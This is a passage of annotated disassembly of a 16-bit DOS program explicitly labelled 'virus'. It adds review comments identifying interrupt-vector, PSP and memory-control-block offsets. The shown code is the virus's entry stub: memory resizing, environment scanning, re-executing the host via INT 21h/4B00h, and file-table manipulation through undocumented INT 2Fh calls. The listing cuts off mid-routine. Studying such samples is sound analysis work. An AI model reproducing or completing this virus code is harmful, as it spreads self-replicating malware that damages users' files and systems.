; Disassembler-generated symbolic offsets.  Each "(seg:off=val)" note records
; the segment:offset the disassembler resolved the constant to and the word
; value it observed there at disassembly time; the equates themselves are bare
; offsets, used with whatever segment register the referencing instruction
; names or assumes.
; Segment 0000h is the real-mode interrupt vector table: 4 bytes per vector,
; offset word first, then segment word.
data_2e equ 6 ; (0000:0006=70h) IVT: INT 1 vector, segment word
data_1e equ 4 ; (0000:0004=7fbh) IVT: INT 1 vector, offset word
data_4e equ 84h ; (0000:0084=16h) IVT: INT 21h vector (21h*4), offset word
data_3e equ 4ch ; (0000:004c=88h) IVT: INT 13h vector (13h*4), offset word
; Segment 0046h: offsets 0Ah/16h/2Ch match the PSP layout (termination
; address, parent-PSP segment, environment segment).
; NOTE(review): presumably this program's PSP -- confirm against how ds is
; loaded before these are read.
data_6e equ 0ah ; (0046:000a=0)
data_7e equ 16h ; (0046:0016=0)
data_8e equ 2ch ; (0046:002c=50h) the entry code reads this word and branches on it being zero
data_9e equ 8abh ; (0046:08ab=4146h) word beyond the PSP in the same segment; meaning not visible here
data_10e equ 8adh ; (0046:08ad=3154h) same; meaning not visible here
; Segment 08d4h: purpose not determinable from this view.
data_11e equ 0ah ; (08d4:000a=2f9h)
data_12e equ 0ch ; (08d4:000c=3872h)
data_13e equ 100h ; (08d4:0100=0dfh)
; Segments 4815h and 8343h each sit one paragraph below 4816h / 8344h.
; NOTE(review): offset 1 of a DOS memory control block is its owner field, so
; these look like MCB headers of the blocks that follow -- verify; an owner
; value of 0FFFFh is unusual.
data_14e equ 1 ; (4815:0001=0ffffh)
data_15e equ 100h ; (4816:0100=0ffh)
data_16e equ 1 ; (8343:0001=0ffffh)
; Segment 8344h: resolved by the disassembler as this program's own cs
; (see the cs:data_17e indirect jump and the data_51e block built with
; es=cs in the entry code).  With org 100h the segment base is the PSP.
data_17e equ 0ah ; (8344:000a=0) PSP offset 0Ah: termination address; target of the final far jmp
data_18e equ 0eh ; (8344:000e=8344h) PSP offset 0Eh: Ctrl-Break (INT 23h) save slot
data_49e equ 900h ; (8344:0900=0)
data_50e equ 902h ; (8344:0902=0)
data_51e equ 904h ; (8344:0904=8344h) filled by the entry code as the es:bx parameter block for INT 21h/4B00h
data_52e equ 906h ; (8344:0906=0)
data_53e equ 9efh ; (8344:09ef=0)
data_54e equ 10afh ; (8344:10af=0)
data_55e equ 10b1h ; (8344:10b1=0)
data_56e equ 10b3h ; (8344:10b3=0)
; Single 16-bit real-mode segment (MASM-style directives); cs and ds are both
; assumed to address seg_a.  The matching "ends" directive is outside this view.
seg_a segment byte public
assume cs:seg_a, ds:seg_a
; Code begins at offset 100h, immediately after the 256-byte PSP -- the
; .COM-file layout, so PSP fields are reachable as cs:0..cs:0FFh.
org 100h
virus proc far
start:
mov ah,30h ; 0
int 21h ; dos services ah=function 30h
; get dos version number ax
cmp al,3
jb loc_1 ; jump if below
mov ax,1200h
int 2fh ; multiplex/spooler al=func 00h
; get installed status
cmp al,0ffh
loc_1:
mov ax,0bh
jc loc_4 ; jump if carry set
mov ah,4ah ; j
mov bx,140h
int 21h ; dos services ah=function 4ah
; change mem allocation, bx=siz
jc loc_4 ; jump if carry set
cli ; disable interrupts
push cs
pop ss
mov sp,13feh
call sub_1 ; (01eb)
sti ; enable interrupts
mov ax,ds:data_8e ; (0046:002c=50h)
or ax,ax ; zero ?
jz loc_5 ; jump if zero
call sub_13 ; (07ec)
mov es,ax
xor di,di ; zero register
xor ax,ax ; zero register
loc_2:
scasw ; scan es:[di] for ax
jnz loc_2 ; jump if not zero
scasw ; scan es:[di] for ax
mov dx,di
push es
pop ds
mov ah,48h ; h
mov bx,0ffffh
int 21h ; dos services ah=function 48h
; allocate memory, bx=bytes/16
mov ah,48h ; h
int 21h ; dos services ah=function 48h
; allocate memory, bx=bytes/16
mov es,ax
mov ah,49h ; i
int 21h ; dos services ah=function 49h
; release memory block, es=seg
xor ax,ax ; zero register
mov cx,bx
mov bx,es
locloop_3:
push cx
mov cx,8
xor di,di ; zero register
rep stosw ; rep when cx >0 store ax to es:[di]
inc bx
mov es,bx
pop cx
loop locloop_3 ; loop if cx > 0
push cs
pop es
mov bx,data_51e ; (8344:0904=44h)
mov di,bx
stosw ; store ax to es:[di]
mov al,80h
stosw ; store ax to es:[di]
mov ax,cs
stosw ; store ax to es:[di]
mov ax,5ch
stosw ; store ax to es:[di]
mov ax,cs
stosw ; store ax to es:[di]
mov ax,6ch
stosw ; store ax to es:[di]
mov ax,cs
stosw ; store ax to es:[di]
mov ax,4b00h
int 21h ; dos services ah=function 4bh
; run progm @ds:dx, parm @es:bx
loc_4:
push cs
pop ds
call sub_13 ; (07ec)
jmp dword ptr cs:data_17e ; (8344:000a=0)
loc_5:
mov ax,1220h
mov bx,5
int 2fh ; ??int non-standard interrupt.
push bx
dec bx
dec bx
mov es:[di],bl
mov ax,1216h
int 2fh ; ??int non-standard interrupt.
dec bx
dec bx
mov es:[di],bx
mov ah,48h ; h
mov bx,0ffffh
int 21h ; dos services ah=function 48h
; allocate memory, bx=bytes/16
mov ah,48h ; h
int 21h ; dos services ah=function 48h
; allocate memory, bx=bytes/16
mov ds,ax
pop bx
mov ax,4200h
xor cx,cx ; zero register